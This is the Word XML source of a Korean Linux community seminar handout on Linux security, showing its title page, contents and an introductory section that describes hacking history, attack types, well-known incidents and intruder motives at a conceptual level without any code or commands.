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" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>제</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>회</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>리눅스</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>공동체</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">세미나 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">B-8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>세션</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>리눅스</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>보안</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림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굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>오태호</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://postech.edu/~ohhara</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>ohhara@postech.edu</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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  <w:t>차례</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal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autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>What is hacking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>해킹은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무엇이고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해커는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왜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해킹을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하는가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24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux security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24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>리눅스를</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>해커로부터</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>방어하기</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림"/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rFonts w:eastAsia="굴림"/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rFonts w:eastAsia="굴림"/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rFonts w:eastAsia="굴림"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>하는가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24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Classical hacking technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>해커들이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일반적으로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시스템을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해킹할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때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어떤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기법을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사용하는가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24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Buffer overflow attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>해커들이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가장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많이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사용하는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해킹기법인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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Buffer overflow attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>은</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>무엇인가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24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>What is hacking?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="굴림" w:hAnsi="굴림" w:eastAsia="굴림"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11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Who is hacker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ut with repeated irregular blows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Examine something very minutely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 person who hacks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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racker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ystem intruder/destroyer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 means cracker nowaday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Meaning has been changed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1"/>
          <w:numId w:val="11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istory of hacking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4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elephone hacking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Use telephone freely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t’s called phreaking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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omputer viru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Destroy many computers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Network hacking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 the important server remotely and destroy/modify/disclose the information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 xml:space="preserve">1-3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Types of hacking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6430" cy="3122295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3122280"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4456440" cy="3122280"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="246960" y="38052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8052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32800"/>
                            <a:ext cx="14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0"/>
                            <a:ext cx="1423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ata trans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772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6632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06632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1860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20860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20860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06632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6632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218600"/>
                            <a:ext cx="14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20860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20860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913680"/>
                            <a:ext cx="1423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Interru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913680"/>
                            <a:ext cx="1423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Interce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760" y="152352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218600"/>
                            <a:ext cx="3092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81808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37200"/>
                            <a:ext cx="618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2436480"/>
                            <a:ext cx="556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1980720"/>
                            <a:ext cx="1423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Mod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760" y="2818080"/>
                            <a:ext cx="24696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440" y="2436480"/>
                            <a:ext cx="556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1980720"/>
                            <a:ext cx="1423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Fabr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50.85pt;height:245.85pt" coordorigin="180,0" coordsize="7017,4917">
                <v:oval id="shape_0" fillcolor="#00cc99" stroked="t" o:allowincell="f" style="position:absolute;left:569;top:599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202;top:599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line id="shape_0" from="959,839" to="3200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;top:0;width:2241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ata trans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319" to="7197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569;top:1679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202;top:1679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line id="shape_0" from="959,1919" to="1932,1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569;top:3478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202;top:3478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884;top:1679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6516;top:1679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line id="shape_0" from="4274,1919" to="6515,1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3884;top:3478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6516;top:3478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shape id="shape_0" stroked="f" o:allowincell="f" style="position:absolute;left:959;top:1439;width:22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Interru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1439;width:22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Interce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5249;top:2399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line id="shape_0" from="4761,1919" to="5247,2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1934;top:4438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line id="shape_0" from="959,3838" to="1932,4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4,3837" to="3200,4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9;top:3119;width:22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Mod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5249;top:4438;width:388;height:478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line id="shape_0" from="5639,3837" to="6515,4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4;top:3119;width:22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Fabr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1-4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Hacking accident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4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nternet Worm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Robert T. Morris made an internet worm. It spread through the internet and crashed about 6000 systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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uckoo’s Egg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56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Clifford Stoll caught the hackers who are the German hackers applied by KGB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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P Spoof</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Kevin Mitnick was caught by Tsutomu Shimomura who was security expert. Kevin Mitnick uses the IP Spoof attack in this accident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1-5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Why do hackers hack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3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Just for fun</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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how off</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 other systems secretly</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Notify many people their thought</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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teal important information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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Destroy enemy’s computer network during the war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1-6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>What do hackers do after hacking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Patch security hol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 other hackers can’t intrude</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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lear logs and hide themselves</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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nstall rootkit ( backdoor )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 hacker who hacked the system can use the system later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56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>It contains trojan ls, ps, and so on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nstall irc related program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dentd, irc, bitchx, eggdrop, bnc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nstall scanner program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mscan, sscan, nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nstall exploit program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nstall denial of service program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Use all of installed programs silently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TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1-7. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>What do hackers know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Don’t know how to use vi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Don’t know what unix is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Don’t know what they do</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Know how to intrude the system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Know how to crash the syste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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Know where the hacking programs ar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1-8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How can kid hack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Kid has much of tim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Kid can search for longer time than other people</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ll hacking program is easy to use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Kid doesn’t have to know how the hacking program works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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se kids are called script kiddie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1-9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Why can’t Korean kid hack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2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lmost all Korean kids don’t know English well</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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lmost all hacking program manuals are written in English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owever, many hacking program manuals are being translated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1-10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How can be a real hacker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3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tudy C/C++/assembly language</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tudy computer architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tudy operating system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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tudy computer network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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amine the hacking tools for a month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rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Think the problem of the compu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 xml:space="preserve">1-11. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Why can’t defend against hacker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re are many unknown security hole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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s need to know only one security hole to hack the system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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Admin need to know all security holes to defend the syst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 xml:space="preserve">1-12. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
